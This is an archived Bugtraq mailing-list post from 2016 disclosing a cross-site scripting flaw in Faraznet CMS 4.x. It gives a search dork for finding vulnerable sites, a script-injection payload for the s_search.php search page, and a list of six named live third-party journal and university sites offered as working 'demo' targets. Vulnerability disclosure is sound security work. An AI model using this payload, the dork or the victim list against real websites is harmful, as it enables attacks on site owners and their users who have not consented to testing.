lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201611070807.uA7875An010763@sf01web1.securityfocus.com>
Date: Mon, 7 Nov 2016 08:07:05 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Faraznet Cms Cross-Site Scripting Vulnerability

Cross-Site Scripting in Faraznet Cms Version 4.x


###########################

# Faraznet Cms Cross-Site Scripting Vulnerability

###########################

#####################################

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : Faraznet Cms Cross-Site Scripting Vulnerability

# Vulnerability : Cross-Site Scripting (xss)

# Vulnerability on : s_search.php

# Version : 4.x

# Dork : "Designed By Faraznet"

# Vendor site : http://www.faraznet.net

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir

Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

Email : iedb.team@...il.com

# Archive Exploit : http://iedb.ir/exploits-6119.html

#####################################

# Bug :

http://www.site.com/en/s_search.php

Post Script : '"<script>alert(/Iedb.Ir/)</script>

# Dem0 [ Xss ]

http://ijssh.com/en/s_search.php

http://www.intjournalssm.com/en/s_search.php

http://www.sjsmjournal.com/en/s_search.php

http://www.irjabs.com/en/s_search.php

http://geo-tech.iauzah.ac.ir/en/s_search.php

http://www.nafasjournal.ir/en/s_search.php

#####################################

Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir

#####################################

# Archive Exploit = http://iedb.ir/exploits-6119.html

#####################################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-07]

###########################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ